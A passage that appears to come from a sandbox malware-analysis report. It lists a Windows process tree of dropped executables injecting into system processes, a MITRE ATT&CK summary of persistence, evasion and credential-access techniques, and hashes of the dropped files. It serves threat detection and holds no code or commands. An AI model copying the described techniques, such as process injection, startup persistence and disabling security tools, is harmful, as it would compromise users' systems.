                                                                              "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                              1⤵
                                                                              • Suspicious behavior: MapViewOfSection
                                                                              • Suspicious use of SetWindowsHookEx
                                                                              • Suspicious use of WriteProcessMemory
                                                                              PID:4440
                                                                            • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                              "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                              1⤵
                                                                              • Modifies Internet Explorer settings
                                                                              • Modifies registry class
                                                                              • Suspicious use of AdjustPrivilegeToken
                                                                              PID:4924
                                                                            • C:\Windows\system32\werfault.exe
                                                                              werfault.exe /h /shared Global\20934dbff42e4b0ca70df42b9fbd3d57 /t 5036 /p 4924
                                                                              1⤵
                                                                                PID:5272
                                                                              • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                1⤵
                                                                                • Modifies registry class
                                                                                PID:5624
                                                                              • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                1⤵
                                                                                • Modifies registry class
                                                                                PID:4568
                                                                              • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                1⤵
                                                                                • Executes dropped EXE
                                                                                • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                • Modifies registry class
                                                                                PID:2220
                                                                              • \??\c:\windows\system32\svchost.exe
                                                                                c:\windows\system32\svchost.exe -k netsvcs -s seclogon
                                                                                1⤵
                                                                                • Suspicious use of NtCreateUserProcessOtherParentProcess
                                                                                PID:3932
                                                                              • C:\Users\Admin\AppData\Local\Temp\5177.exe
                                                                                C:\Users\Admin\AppData\Local\Temp\5177.exe
                                                                                1⤵
                                                                                • Executes dropped EXE
                                                                                PID:4344
                                                                              • C:\Users\Admin\AppData\Local\Temp\538C.exe
                                                                                C:\Users\Admin\AppData\Local\Temp\538C.exe
                                                                                1⤵
                                                                                • Executes dropped EXE
                                                                                PID:4456
                                                                              • C:\Users\Admin\AppData\Local\Temp\593A.exe
                                                                                C:\Users\Admin\AppData\Local\Temp\593A.exe
                                                                                1⤵
                                                                                • Executes dropped EXE
                                                                                • Suspicious use of SetThreadContext
                                                                                PID:5900
                                                                                • C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                                  C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                                  2⤵
                                                                                    PID:6116
                                                                                • C:\Users\Admin\AppData\Local\Temp\5F26.exe
                                                                                  C:\Users\Admin\AppData\Local\Temp\5F26.exe
                                                                                  1⤵
                                                                                  • Executes dropped EXE
                                                                                  • Loads dropped DLL
                                                                                  PID:5292
                                                                                • C:\Users\Admin\AppData\Local\Temp\632F.exe
                                                                                  C:\Users\Admin\AppData\Local\Temp\632F.exe
                                                                                  1⤵
                                                                                  • Executes dropped EXE
                                                                                  PID:5196
                                                                                  • C:\Users\Admin\AppData\Local\Temp\1456790592.exe
                                                                                    "C:\Users\Admin\AppData\Local\Temp\1456790592.exe"
                                                                                    2⤵
                                                                                    • Executes dropped EXE
                                                                                    • Suspicious use of SetThreadContext
                                                                                    PID:4396
                                                                                    • C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                                      C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                                      3⤵
                                                                                        PID:4860
                                                                                    • C:\Users\Admin\AppData\Local\Temp\1456659522.exe
                                                                                      "C:\Users\Admin\AppData\Local\Temp\1456659522.exe"
                                                                                      2⤵
                                                                                      • Executes dropped EXE
                                                                                      • Suspicious use of SetThreadContext
                                                                                      PID:5820
                                                                                      • C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                                        C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                                        3⤵
                                                                                          PID:1060
                                                                                    • C:\Users\Admin\AppData\Local\Temp\6785.exe
                                                                                      C:\Users\Admin\AppData\Local\Temp\6785.exe
                                                                                      1⤵
                                                                                      • Executes dropped EXE
                                                                                      PID:5072
                                                                                    • C:\Users\Admin\AppData\Local\Temp\6D91.exe
                                                                                      C:\Users\Admin\AppData\Local\Temp\6D91.exe
                                                                                      1⤵
                                                                                      • Executes dropped EXE
                                                                                      • Drops startup file
                                                                                      • NTFS ADS
                                                                                      PID:4912
                                                                                    • C:\Windows\SysWOW64\explorer.exe
                                                                                      C:\Windows\SysWOW64\explorer.exe
                                                                                      1⤵
                                                                                        PID:5368
                                                                                      • C:\Windows\explorer.exe
                                                                                        C:\Windows\explorer.exe
                                                                                        1⤵
                                                                                          PID:5708
                                                                                        • C:\Windows\SysWOW64\explorer.exe
                                                                                          C:\Windows\SysWOW64\explorer.exe
                                                                                          1⤵
                                                                                            PID:2196
                                                                                          • C:\Windows\explorer.exe
                                                                                            C:\Windows\explorer.exe
                                                                                            1⤵
                                                                                            • Suspicious behavior: MapViewOfSection
                                                                                            PID:4760
                                                                                          • C:\Windows\SysWOW64\explorer.exe
                                                                                            C:\Windows\SysWOW64\explorer.exe
                                                                                            1⤵
                                                                                              PID:6004
                                                                                            • C:\Windows\explorer.exe
                                                                                              C:\Windows\explorer.exe
                                                                                              1⤵
                                                                                              • Suspicious behavior: MapViewOfSection
                                                                                              PID:4408
                                                                                            • C:\Windows\SysWOW64\explorer.exe
                                                                                              C:\Windows\SysWOW64\explorer.exe
                                                                                              1⤵
                                                                                                PID:5284
                                                                                              • C:\Windows\explorer.exe
                                                                                                C:\Windows\explorer.exe
                                                                                                1⤵
                                                                                                • Suspicious behavior: MapViewOfSection
                                                                                                PID:5552
                                                                                              • C:\Windows\SysWOW64\explorer.exe
                                                                                                C:\Windows\SysWOW64\explorer.exe
                                                                                                1⤵
                                                                                                  PID:2192
                                                                                                • C:\Windows\system32\svchost.exe
                                                                                                  C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum
                                                                                                  1⤵
                                                                                                    PID:4104
                                                                                                  • \??\c:\windows\system32\svchost.exe
                                                                                                    c:\windows\system32\svchost.exe -k localsystemnetworkrestricted -s fhsvc
                                                                                                    1⤵
                                                                                                      PID:2280
                                                                                                    • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe
                                                                                                      "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca
                                                                                                      1⤵
                                                                                                      • Drops file in Windows directory
                                                                                                      • Modifies registry class
                                                                                                      • Suspicious use of SetWindowsHookEx
                                                                                                      PID:3700
                                                                                                    • C:\Windows\system32\browser_broker.exe
                                                                                                      C:\Windows\system32\browser_broker.exe -Embedding
                                                                                                      1⤵
                                                                                                      • Modifies Internet Explorer settings
                                                                                                      PID:4284
                                                                                                    • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                      "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                      1⤵
                                                                                                      • Modifies registry class
                                                                                                      • Suspicious behavior: MapViewOfSection
                                                                                                      • Suspicious use of SetWindowsHookEx
                                                                                                      PID:4472
                                                                                                    • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                      "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                      1⤵
                                                                                                      • Modifies registry class
                                                                                                      PID:4340
                                                                                                    • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                      "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                      1⤵
                                                                                                        PID:5824
                                                                                                        • C:\Windows\system32\WerFault.exe
                                                                                                          C:\Windows\system32\WerFault.exe -u -p 5824 -s 2020
                                                                                                          2⤵
                                                                                                          • Program crash
                                                                                                          PID:5520
                                                                                                      • C:\Windows\system32\svchost.exe
                                                                                                        C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum
                                                                                                        1⤵
                                                                                                          PID:3220
                                                                                                        • \??\c:\windows\system32\svchost.exe
                                                                                                          c:\windows\system32\svchost.exe -k localsystemnetworkrestricted -s fhsvc
                                                                                                          1⤵
                                                                                                            PID:5884

                                                                                                          Network

                                                                                                          MITRE ATT&CK Matrix ATT&CK v6

                                                                                                          Persistence

                                                                                                          Registry Run Keys / Startup Folder

                                                                                                          1
                                                                                                          T1060

                                                                                                          BITS Jobs

                                                                                                          1
                                                                                                          T1197

                                                                                                          Defense Evasion

                                                                                                          Disabling Security Tools

                                                                                                          2
                                                                                                          T1089

                                                                                                          Modify Registry

                                                                                                          5
                                                                                                          T1112

                                                                                                          BITS Jobs

                                                                                                          1
                                                                                                          T1197

                                                                                                          Install Root Certificate

                                                                                                          1
                                                                                                          T1130

                                                                                                          Credential Access

                                                                                                          Credentials in Files

                                                                                                          3
                                                                                                          T1081

                                                                                                          Discovery

                                                                                                          Software Discovery

                                                                                                          1
                                                                                                          T1518

                                                                                                          Query Registry

                                                                                                          4
                                                                                                          T1012

                                                                                                          System Information Discovery

                                                                                                          5
                                                                                                          T1082

                                                                                                          Security Software Discovery

                                                                                                          1
                                                                                                          T1063

                                                                                                          Peripheral Device Discovery

                                                                                                          1
                                                                                                          T1120

                                                                                                          Remote System Discovery

                                                                                                          1
                                                                                                          T1018

                                                                                                          Collection

                                                                                                          Data from Local System

                                                                                                          3
                                                                                                          T1005

                                                                                                          Command and Control

                                                                                                          Web Service

                                                                                                          1
                                                                                                          T1102

                                                                                                          Replay Monitor

                                                                                                          Loading Replay Monitor...

                                                                                                          Downloads

                                                                                                          • C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe
                                                                                                            MD5

                                                                                                            7124be0b78b9f4976a9f78aaeaed893a

                                                                                                            SHA1

                                                                                                            804f3e4b3f9131be5337b706d5a9ea6fcfa53e25

                                                                                                            SHA256

                                                                                                            bb28d7beea6e3faa641f69b9b4866858d87ca63f9eef15dae350b2dc28b537c3

                                                                                                            SHA512

                                                                                                            49f6df2ee5af4032ca47b01beb08648c7235a2dea51546aab8fc14d5f0ae7baa53cc539f24ea21d6db67882b4e65c8d271630fb8e12144cf24f6e8a4e598dff3

                                                                                                          • C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe
                                                                                                            MD5

                                                                                                            7124be0b78b9f4976a9f78aaeaed893a

                                                                                                            SHA1

                                                                                                            804f3e4b3f9131be5337b706d5a9ea6fcfa53e25

                                                                                                            SHA256

                                                                                                            bb28d7beea6e3faa641f69b9b4866858d87ca63f9eef15dae350b2dc28b537c3

                                                                                                            SHA512

                                                                                                            49f6df2ee5af4032ca47b01beb08648c7235a2dea51546aab8fc14d5f0ae7baa53cc539f24ea21d6db67882b4e65c8d271630fb8e12144cf24f6e8a4e598dff3

                                                                                                          • C:\Program Files\Internet Explorer\EZTWOVLTSJ\ultramediaburner.exe
                                                                                                            MD5

                                                                                                            6103ca066cd5345ec41feaf1a0fdadaf

                                                                                                            SHA1

                                                                                                            938acc555933ee4887629048be4b11df76bb8de8

                                                                                                            SHA256

                                                                                                            b8d950bf6fa228454571f15cc4b7b6fbaa539f1284e43946abd90934db925201

                                                                                                            SHA512

                                                                                                            a9062e1fac2f6073a134d9756c84f70999240e36a98cb39684018e7d5bd3772f2ca21ab35bd2c6bd60413eb7306376e7f530e78ce4ebcfe256f766e8c42d16b3

                                                                                                          • C:\Program Files\Internet Explorer\EZTWOVLTSJ\ultramediaburner.exe
                                                                                                            MD5

                                                                                                            6103ca066cd5345ec41feaf1a0fdadaf

                                                                                                            SHA1

                                                                                                            938acc555933ee4887629048be4b11df76bb8de8

                                                                                                            SHA256

                                                                                                            b8d950bf6fa228454571f15cc4b7b6fbaa539f1284e43946abd90934db925201

                                                                                                            SHA512

                                                                                                            a9062e1fac2f6073a134d9756c84f70999240e36a98cb39684018e7d5bd3772f2ca21ab35bd2c6bd60413eb7306376e7f530e78ce4ebcfe256f766e8c42d16b3

                                                                                                          • C:\Program Files\install.dat
                                                                                                            MD5

                                                                                                            bef5c483c6eba257020201190666e28d

                                                                                                            SHA1

                                                                                                            e7f5cda41f731eea23bc45c0a6c06ad91f1d7df8

                                                                                                            SHA256

                                                                                                            d42b23175385ccc042ffebd37cc0f25847c790fb6f98bad0cd024f70f85b3fce

                                                                                                            SHA512

                                                                                                            302bca91e431e388f7bcff837ab6b7be23a9a38026410589e4ae3c86be057039117897429b5664eccee8a6871904f8e44629acf7d837cece8c701fb6915fdf90

                                                                                                          • C:\Program Files\install.dll
                                                                                                            MD5

                                                                                                            c6a2e4e23319dec9d56f8029ef834e83

                                                                                                            SHA1

                                                                                                            299e80473cbe56b596a2d4d38aea0aab46826167

                                                                                                            SHA256

                                                                                                            6ae4bd10f8bc7f3e5856c7f3571d165787f48d23f95ccfa823a5dab74f7fd554

                                                                                                            SHA512

                                                                                                            2a30529c2254ff481ab099032829d1b533d8bb6fca6a766d04e3febd6dc87ba34852eb7354ffc8d0ed7f584b5bff587e2b549c4f4c9150e98a2ff6a0f751438a

                                                                                                          • C:\Users\Admin\AppData\Local\Temp\2h4kjpmn.txs\askinstall39.exe
                                                                                                            MD5

                                                                                                            8a0f8e3fe05343e301cd0d213c5257c6

                                                                                                            SHA1

                                                                                                            25885a7898a4c31f45523536ef3447fd46f6fa62

                                                                                                            SHA256

                                                                                                            3dd53bf240c171977c1039c10a76cc09330ed29f64b08753b57006c4d71e084c

                                                                                                            SHA512

                                                                                                            662bffb3397f717bdc9547aafcb1cad555245b7a39bff96b3d0dd258c3051ef033c4cfe8488632cf3e2334bbfcd8dfc7728fee7f853a5b29cc4ecf124b353987

                                                                                                          • C:\Users\Admin\AppData\Local\Temp\2h4kjpmn.txs\askinstall39.exe
                                                                                                            MD5

                                                                                                            8a0f8e3fe05343e301cd0d213c5257c6

                                                                                                            SHA1

                                                                                                            25885a7898a4c31f45523536ef3447fd46f6fa62

                                                                                                            SHA256

                                                                                                            3dd53bf240c171977c1039c10a76cc09330ed29f64b08753b57006c4d71e084c

                                                                                                            SHA512

                                                                                                            662bffb3397f717bdc9547aafcb1cad555245b7a39bff96b3d0dd258c3051ef033c4cfe8488632cf3e2334bbfcd8dfc7728fee7f853a5b29cc4ecf124b353987

                                                                                                          • C:\Users\Admin\AppData\Local\Temp\RarSFX0\VCRUNTIME140_1.dll
                                                                                                            MD5

                                                                                                            ab03551e4ef279abed2d8c4b25f35bb8

                                                                                                            SHA1

                                                                                                            09bc7e4e1a8d79ee23c0c9c26b1ea39de12a550e

                                                                                                            SHA256

                                                                                                            f8bc270449ca6bb6345e88be3632d465c0a7595197c7954357dc5066ed50ae44

                                                                                                            SHA512

                                                                                                            0e7533b8d7e5019ffd1e73937c1627213711725e88c6d7321588f7fffe9e1b4ef5c38311548adbd2c0ee9b407135646593bf1498cbee92275f4e0a22ace78909

                                                                                                          • C:\Users\Admin\AppData\Local\Temp\RarSFX0\id.txt
                                                                                                            MD5

                                                                                                            ffbc4675f864e0e9aab8bdf7a0437010

                                                                                                            SHA1

                                                                                                            e2ea3c6b50c654e7c809c252b97d94386fb283fc

                                                                                                            SHA256

                                                                                                            dea26157fa355301663174eac368538cff8939f36681d6712dedba439ab98b70

                                                                                                            SHA512

                                                                                                            ac99da45823edd4f3d86747d54e5cf6a0c77c721eedb9f325a77b774fe97faf2ddd410a5cf6fb60c917bdf0944bb3fe572ac35a81d9c6cb77857de07fa059b85

                                                                                                          • C:\Users\Admin\AppData\Local\Temp\RarSFX0\main.exe
                                                                                                            MD5

                                                                                                            1843536720fc4be858dca73325877426

                                                                                                            SHA1

                                                                                                            5c6b1c9a26f21372733d2e39a0c941f911dc6aef

                                                                                                            SHA256

                                                                                                            f54d3c7ee2e4033da7b8ba2561e7e42a6d8f732038ba7fa2e31233c36fc0e4ec

                                                                                                            SHA512

                                                                                                            6ce7c3f24a5155a00d5d3fd8b3c94b6a5e09bb0e280db25007e7596f2dca8340e004586dc04d5cb5b537567d64137c36ce37fe79e1ced7e47d9f17223703cf8a

                                                                                                          • C:\Users\Admin\AppData\Local\Temp\RarSFX0\main.exe
                                                                                                            MD5

                                                                                                            1843536720fc4be858dca73325877426

                                                                                                            SHA1

                                                                                                            5c6b1c9a26f21372733d2e39a0c941f911dc6aef

                                                                                                            SHA256

                                                                                                            f54d3c7ee2e4033da7b8ba2561e7e42a6d8f732038ba7fa2e31233c36fc0e4ec

                                                                                                            SHA512

                                                                                                            6ce7c3f24a5155a00d5d3fd8b3c94b6a5e09bb0e280db25007e7596f2dca8340e004586dc04d5cb5b537567d64137c36ce37fe79e1ced7e47d9f17223703cf8a

                                                                                                          • C:\Users\Admin\AppData\Local\Temp\RarSFX0\parse.exe
                                                                                                            MD5

                                                                                                            787822a3f6e82ac53becdc6a50a8cdab

                                                                                                            SHA1

                                                                                                            47dec0476f327c99b6aaae8e92b18010f6d07c5f

                                                                                                            SHA256

                                                                                                            31c18d5f3b764fce15b94b6ec752acaa486d4ac16cab3bebb5b5b8f971804927

                                                                                                            SHA512

                                                                                                            1029007e65cb2a67915e75a0e6b8d3e3419b9ba53c52f61428dbb8cae71804b51ee284defc96489aba7719cbe638c411af9cea36a05d9f3633d3bac7c7b9aa58

                                                                                                          • C:\Users\Admin\AppData\Local\Temp\RarSFX0\parse.exe
                                                                                                            MD5

                                                                                                            787822a3f6e82ac53becdc6a50a8cdab

                                                                                                            SHA1

                                                                                                            47dec0476f327c99b6aaae8e92b18010f6d07c5f

                                                                                                            SHA256

                                                                                                            31c18d5f3b764fce15b94b6ec752acaa486d4ac16cab3bebb5b5b8f971804927

                                                                                                            SHA512

                                                                                                            1029007e65cb2a67915e75a0e6b8d3e3419b9ba53c52f61428dbb8cae71804b51ee284defc96489aba7719cbe638c411af9cea36a05d9f3633d3bac7c7b9aa58

                                                                                                          • C:\Users\Admin\AppData\Local\Temp\RarSFX0\parse.exe
                                                                                                            MD5

                                                                                                            787822a3f6e82ac53becdc6a50a8cdab

                                                                                                            SHA1

                                                                                                            47dec0476f327c99b6aaae8e92b18010f6d07c5f

                                                                                                            SHA256

                                                                                                            31c18d5f3b764fce15b94b6ec752acaa486d4ac16cab3bebb5b5b8f971804927

                                                                                                            SHA512

                                                                                                            1029007e65cb2a67915e75a0e6b8d3e3419b9ba53c52f61428dbb8cae71804b51ee284defc96489aba7719cbe638c411af9cea36a05d9f3633d3bac7c7b9aa58

                                                                                                          • C:\Users\Admin\AppData\Local\Temp\RarSFX0\parse.exe
                                                                                                            MD5

                                                                                                            787822a3f6e82ac53becdc6a50a8cdab

                                                                                                            SHA1

                                                                                                            47dec0476f327c99b6aaae8e92b18010f6d07c5f

                                                                                                            SHA256

                                                                                                            31c18d5f3b764fce15b94b6ec752acaa486d4ac16cab3bebb5b5b8f971804927

                                                                                                            SHA512

                                                                                                            1029007e65cb2a67915e75a0e6b8d3e3419b9ba53c52f61428dbb8cae71804b51ee284defc96489aba7719cbe638c411af9cea36a05d9f3633d3bac7c7b9aa58

                                                                                                          • C:\Users\Admin\AppData\Local\Temp\be-0a84b-b6e-61d93-93dd48eb7fe28\Haedajipiqi.exe
                                                                                                            MD5

                                                                                                            c1671cfbdbd5de53b60feb041f290a7d

                                                                                                            SHA1

                                                                                                            7d8c20bf34a7d970f98a2d339d022e2e143b5c58

                                                                                                            SHA256

                                                                                                            53637bf7daa6b5edf35a77767d903da429e0b9a3a6705194f137925f44c1522a

                                                                                                            SHA512

                                                                                                            751b869a9903939b6a3dd208b428656d694969fcf475bb0a28e1b9b2e7f22c0575b6b9b1b6ee5e661589812004d48c81e02fdaf8981440a59c1995cd0f3acceb

                                                                                                          • C:\Users\Admin\AppData\Local\Temp\be-0a84b-b6e-61d93-93dd48eb7fe28\Haedajipiqi.exe
                                                                                                            MD5

                                                                                                            c1671cfbdbd5de53b60feb041f290a7d

                                                                                                            SHA1

                                                                                                            7d8c20bf34a7d970f98a2d339d022e2e143b5c58

                                                                                                            SHA256

                                                                                                            53637bf7daa6b5edf35a77767d903da429e0b9a3a6705194f137925f44c1522a

                                                                                                            SHA512

                                                                                                            751b869a9903939b6a3dd208b428656d694969fcf475bb0a28e1b9b2e7f22c0575b6b9b1b6ee5e661589812004d48c81e02fdaf8981440a59c1995cd0f3acceb

                                                                                                          • C:\Users\Admin\AppData\Local\Temp\be-0a84b-b6e-61d93-93dd48eb7fe28\Haedajipiqi.exe.config
                                                                                                            MD5

                                                                                                            98d2687aec923f98c37f7cda8de0eb19

                                                                                                            SHA1

                                                                                                            f6dcfcdcfe570340ecdbbd9e2a61f3cb4f281ba7

                                                                                                            SHA256

                                                                                                            8a94163256a722ef8cc140bcd115a5b8f8725c04fe158b129d47be81cb693465

                                                                                                            SHA512

                                                                                                            95c7290d59749df8df495e04789c1793265e0f34e0d091df5c0d4aefe1af4c8ac1f5460f1f198fc28c4c8c900827b8f22e2851957bbaea5914ea962b3a1d0590

                                                                                                          • C:\Users\Admin\AppData\Local\Temp\be-0a84b-b6e-61d93-93dd48eb7fe28\Kenessey.txt
                                                                                                            MD5

                                                                                                            97384261b8bbf966df16e5ad509922db

                                                                                                            SHA1

                                                                                                            2fc42d37fee2c81d767e09fb298b70c748940f86

                                                                                                            SHA256

                                                                                                            9c0d294c05fc1d88d698034609bb81c0c69196327594e4c69d2915c80fd9850c

                                                                                                            SHA512

                                                                                                            b77fe2d86fbc5bd116d6a073eb447e76a74add3fa0d0b801f97535963241be3cdce1dbcaed603b78f020d0845b2d4bfc892ceb2a7d1c8f1d98abc4812ef5af21

                                                                                                          • C:\Users\Admin\AppData\Local\Temp\cdgj3i3k.4gw\SunLabsPlayer.exe
                                                                                                            MD5

                                                                                                            97dca97cc65a5fba28fd259b0f6d61b8

                                                                                                            SHA1

                                                                                                            482806a880232c30ef370b5507a6bad8d8e5213c

                                                                                                            SHA256

                                                                                                            d2298e6f7c7b593433fc34fade2b12d9f6e4154d85ea3b691615fa0e762d80ce

                                                                                                            SHA512

                                                                                                            95650f30310a1d729cb274b471b3ea357b898ebd8120a7976b5194fd223e1ae2c42267f0740821edfc432797e786cc95926459a6a6422d9279e93562c5ad4f64

                                                                                                          • C:\Users\Admin\AppData\Local\Temp\cdgj3i3k.4gw\SunLabsPlayer.exe
                                                                                                            MD5

                                                                                                            97dca97cc65a5fba28fd259b0f6d61b8

                                                                                                            SHA1

                                                                                                            482806a880232c30ef370b5507a6bad8d8e5213c

                                                                                                            SHA256

                                                                                                            d2298e6f7c7b593433fc34fade2b12d9f6e4154d85ea3b691615fa0e762d80ce

                                                                                                            SHA512

                                                                                                            95650f30310a1d729cb274b471b3ea357b898ebd8120a7976b5194fd223e1ae2c42267f0740821edfc432797e786cc95926459a6a6422d9279e93562c5ad4f64

                                                                                                          • C:\Users\Admin\AppData\Local\Temp\eb-384a5-286-8cd89-502d1f4b100e0\Doqypipohae.exe
                                                                                                            MD5

                                                                                                            b13abfab75b4ac0c6d13856bf66cdced

                                                                                                            SHA1

                                                                                                            54e54f12d4b0904c37385dbd9e7d14664ef43248

                                                                                                            SHA256

                                                                                                            ba8578d0f769689646a0f5a70f72bf9c397fa2908325a5b264da8d1d36c17940

                                                                                                            SHA512

                                                                                                            c0c1ff455193e331ce3c21dd80d9529d692d0bdf02f15c36a918256830bed82277f347731940ecc237526c2653ce976d8c96e1123f5d42dcbfb3e8b5380fc7d0

                                                                                                          • C:\Users\Admin\AppData\Local\Temp\eb-384a5-286-8cd89-502d1f4b100e0\Doqypipohae.exe
                                                                                                            MD5

                                                                                                            b13abfab75b4ac0c6d13856bf66cdced

                                                                                                            SHA1

                                                                                                            54e54f12d4b0904c37385dbd9e7d14664ef43248

                                                                                                            SHA256

                                                                                                            ba8578d0f769689646a0f5a70f72bf9c397fa2908325a5b264da8d1d36c17940

                                                                                                            SHA512

                                                                                                            c0c1ff455193e331ce3c21dd80d9529d692d0bdf02f15c36a918256830bed82277f347731940ecc237526c2653ce976d8c96e1123f5d42dcbfb3e8b5380fc7d0

                                                                                                          • C:\Users\Admin\AppData\Local\Temp\eb-384a5-286-8cd89-502d1f4b100e0\Doqypipohae.exe.config
                                                                                                            MD5

                                                                                                            98d2687aec923f98c37f7cda8de0eb19

                                                                                                            SHA1

                                                                                                            f6dcfcdcfe570340ecdbbd9e2a61f3cb4f281ba7

                                                                                                            SHA256

                                                                                                            8a94163256a722ef8cc140bcd115a5b8f8725c04fe158b129d47be81cb693465

                                                                                                            SHA512

                                                                                                            95c7290d59749df8df495e04789c1793265e0f34e0d091df5c0d4aefe1af4c8ac1f5460f1f198fc28c4c8c900827b8f22e2851957bbaea5914ea962b3a1d0590

                                                                                                          • C:\Users\Admin\AppData\Local\Temp\erzfly2f.0rr\y1.exe
                                                                                                            MD5

                                                                                                            211704d0d7c978042c9fd858fd7a3256

                                                                                                            SHA1

                                                                                                            ed582bf85c777e03990562af0ca5d3503646e462

                                                                                                            SHA256

                                                                                                            98105987364d21e0167d6b6a90510a9beea0746eca7a3326c13c11806ffced79

                                                                                                            SHA512

                                                                                                            a25778cfe12b106e73b2a410276c0fe7b999501abfe2bb4c51d60992691f2d540797c05fcdcd653580f499e3042a32e73d4881a294ba599299b344f58e56ee11

                                                                                                          • C:\Users\Admin\AppData\Local\Temp\erzfly2f.0rr\y1.exe
                                                                                                            MD5

                                                                                                            211704d0d7c978042c9fd858fd7a3256

                                                                                                            SHA1

                                                                                                            ed582bf85c777e03990562af0ca5d3503646e462

                                                                                                            SHA256

                                                                                                            98105987364d21e0167d6b6a90510a9beea0746eca7a3326c13c11806ffced79

                                                                                                            SHA512

                                                                                                            a25778cfe12b106e73b2a410276c0fe7b999501abfe2bb4c51d60992691f2d540797c05fcdcd653580f499e3042a32e73d4881a294ba599299b344f58e56ee11

                                                                                                          • C:\Users\Admin\AppData\Local\Temp\ey15lhss.m0x\md1_1eaf.exe
                                                                                                            MD5

                                                                                                            cb6383d695b51ead4cbfcdfc93b3e4e4

                                                                                                            SHA1

                                                                                                            b412f1f439a8c728f77c98d60e025bf045512f9a

                                                                                                            SHA256

                                                                                                            7617ee6287194ed5186844a41c3e95b6027e8d8d1a08a22601fe2301be3ca03d

                                                                                                            SHA512

                                                                                                            b3a7600b60cdf4dc0a46681f722afdf4690a3c3fe6eeb4f84b4aba4b1b00ebccd1b862f94aac144202fed0c02dfacd61c67d4c111974037772735b8e820c13b2

                                                                                                          • C:\Users\Admin\AppData\Local\Temp\ey15lhss.m0x\md1_1eaf.exe
                                                                                                            MD5

                                                                                                            cb6383d695b51ead4cbfcdfc93b3e4e4

                                                                                                            SHA1

                                                                                                            b412f1f439a8c728f77c98d60e025bf045512f9a

                                                                                                            SHA256

                                                                                                            7617ee6287194ed5186844a41c3e95b6027e8d8d1a08a22601fe2301be3ca03d

                                                                                                            SHA512

                                                                                                            b3a7600b60cdf4dc0a46681f722afdf4690a3c3fe6eeb4f84b4aba4b1b00ebccd1b862f94aac144202fed0c02dfacd61c67d4c111974037772735b8e820c13b2

                                                                                                          • C:\Users\Admin\AppData\Local\Temp\frfpdpyu.nhf\GcleanerWW.exe
                                                                                                            MD5

                                                                                                            4f4adcbf8c6f66dcfc8a3282ac2bf10a

                                                                                                            SHA1

                                                                                                            c35a9fc52bb556c79f8fa540df587a2bf465b940

                                                                                                            SHA256

                                                                                                            6b3c238ebcf1f3c07cf0e556faa82c6b8fe96840ff4b6b7e9962a2d855843a0b

                                                                                                            SHA512

                                                                                                            0d15d65c1a988dfc8cc58f515a9bb56cbaf1ff5cb0a5554700bc9af20a26c0470a83c8eb46e16175154a6bcaad7e280bbfd837a768f9f094da770b7bd3849f88

                                                                                                          • C:\Users\Admin\AppData\Local\Temp\gG4fIrQs88.exe
                                                                                                            MD5

                                                                                                            dac476eb95c28c5cc52eabaf262ac97d

                                                                                                            SHA1

                                                                                                            b8f879f009decfa380dca47e24ce875f5a805d23

                                                                                                            SHA256

                                                                                                            4719cc518e90bc1bfe41169383fb4fdebe96f2d32cf7fb0fdc5fd10020262c0a

